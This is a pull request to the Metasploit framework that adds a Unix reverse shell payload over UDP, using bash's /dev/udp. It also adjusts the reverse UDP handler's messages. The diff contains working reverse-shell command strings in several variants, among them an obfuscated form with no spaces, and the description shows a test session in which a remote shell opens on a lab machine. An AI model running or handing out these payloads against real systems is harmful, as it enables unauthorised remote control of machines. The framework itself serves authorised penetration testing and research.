### PR TITLE
Add cmd/unix/reverse_bash_udp payload

### DIFF
--- a/lib/msf/core/handler/reverse_udp.rb
+++ b/lib/msf/core/handler/reverse_udp.rb
@@ -7,7 +7,7 @@ module Handler
 
 ###
 #
-# This module implements the reverse TCP handler.  This means
+# This module implements the reverse UDP handler.  This means
 # that it listens on a port waiting for a connection until
 # either one is established or it is told to abort.
 #
@@ -21,7 +21,7 @@ module ReverseUdp
 
   #
   # Returns the string representation of the handler type, in this case
-  # 'reverse_tcp'.
+  # 'reverse_udp'.
   #
   def self.handler_type
     return "reverse_udp"
@@ -43,8 +43,8 @@ module ReverseUdp
   end
 
   #
-  # Initializes the reverse TCP handler and ads the options that are required
-  # for all reverse TCP payloads, like local host and local port.
+  # Initializes the reverse UDP handler and ads the options that are required
+  # for all reverse UDP payloads, like local host and local port.
   #
   def initialize(info = {})
     super

--- a/lib/msf/core/handler/reverse_udp.rb
+++ b/lib/msf/core/handler/reverse_udp.rb
@@ -35,6 +35,13 @@ module ReverseUdp
     "reverse"
   end
 
+  # A string suitable for displaying to the user
+  #
+  # @return [String]
+  def human_name
+    "reverse UDP"
+  end
+
   #
   # Initializes the reverse TCP handler and ads the options that are required
   # for all reverse TCP payloads, like local host and local port.
@@ -107,7 +114,7 @@ module ReverseUdp
           via = ""
         end
 
-        print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
+        print_status("Started #{human_name} handler on #{ip}:#{local_port} #{via}")
         break
       rescue
         ex = $!

--- a/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
@@ -55,7 +55,7 @@ module MetasploitModule
   #
   def command_string
     fd = rand(200) + 20
-    return "0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}";
+    return "0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};sh <&#{fd} >&#{fd} 2>&#{fd}";
     # same thing, no semicolons
     #return "/bin/bash #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"
     # same thing, no spaces

--- a/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
@@ -56,9 +56,8 @@ module MetasploitModule
   def command_string
     fd = rand(200) + 20
     return "0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};echo>&#{fd};sh <&#{fd} >&#{fd} 2>&#{fd}";
-    # same thing, no semicolons
-    #return "/bin/bash #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"
-    # same thing, no spaces
-    #return "s=${IFS:0:1};eval$s\"bash${s}#{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']}$s<&#{fd}$s>&#{fd}&\""
+
+    # no semicolons
+    #return "sh -i >& /dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb
@@ -1,0 +1,64 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_udp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Unix Command Shell, Reverse UDP (/dev/udp)',
+      'Description'   => %q{
+        Creates an interactive shell via bash's builtin /dev/udp.
+
+        This will not work on circa 2009 and older Debian-based Linux
+        distributions (including Ubuntu) because they compile bash
+        without the /dev/udp feature.
+      },
+      'Author'        => [
+        'hdm',   # Reverse bash TCP
+        'bcoles' # Reverse bash UDP
+      ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'unix',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::ReverseUdp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd_bash',
+      'RequiredCmd'   => 'bash-udp',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    fd = rand(200) + 20
+    return "0<&#{fd}-;exec #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}";
+    # same thing, no semicolons
+    #return "/bin/bash #{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"
+    # same thing, no spaces
+    #return "s=${IFS:0:1};eval$s\"bash${s}#{fd}<>/dev/udp/#{datastore['LHOST']}/#{datastore['LPORT']}$s<&#{fd}$s>&#{fd}&\""
+  end
+end


### PR DESCRIPTION
Shameless ripoff of hdm's reverse_bash (tcp) payload.

May or may not be useful.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-udp

The handler doesn't like the payload being terminated using `exit`.

```
msf5 exploit(multi/handler) > run

[*] Started reverse handler on 172.16.191.165:4444 
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.211:34220) at 2019-05-20 03:51:32 -0400

id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare)
$ exit

[-] Session manipulation failed: Connection refused ["/usr/lib/ruby/2.5.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.5.0/socket.rb:452:in `read_nonblock'", "/var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:72:in `read'", "/var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:202:in `get_once'", "/root/Desktop/metasploit-framework/lib/msf/base/sessions/command_shell.rb:638:in `shell_read'", "/root/Desktop/metasploit-framework/lib/msf/base/sessions/command_shell.rb:758:in `_interact_stream'", "/root/Desktop/metasploit-framework/lib/msf/base/sessions/command_shell.rb:745:in `_interact'", "/root/Desktop/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'", "/root/Desktop/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1363:in `cmd_sessions'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'", "/root/Desktop/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:215:in `cmd_exploit'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'", "/root/Desktop/metasploit-framework/lib/rex/ui/text/shell.rb:151:in `run'", "/root/Desktop/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/root/Desktop/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "./msfconsole:49:in `<main>'"]
```

Comparatively, `^C` kills it fine.

```
msf5 exploit(multi/handler) > run

[*] Started reverse handler on 172.16.191.165:4444 
[*] Command shell session 3 opened (172.16.191.165:4444 -> 172.16.191.211:59087) at 2019-05-20 03:51:41 -0400

id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare)
$ ^C
Abort session 3? [y/N]  y
""

[*] 172.16.191.211 - Command shell session 3 closed.  Reason: User exit
msf5 exploit(multi/handler) > 
```

I presume this is an issue with the handler rather than the payload.
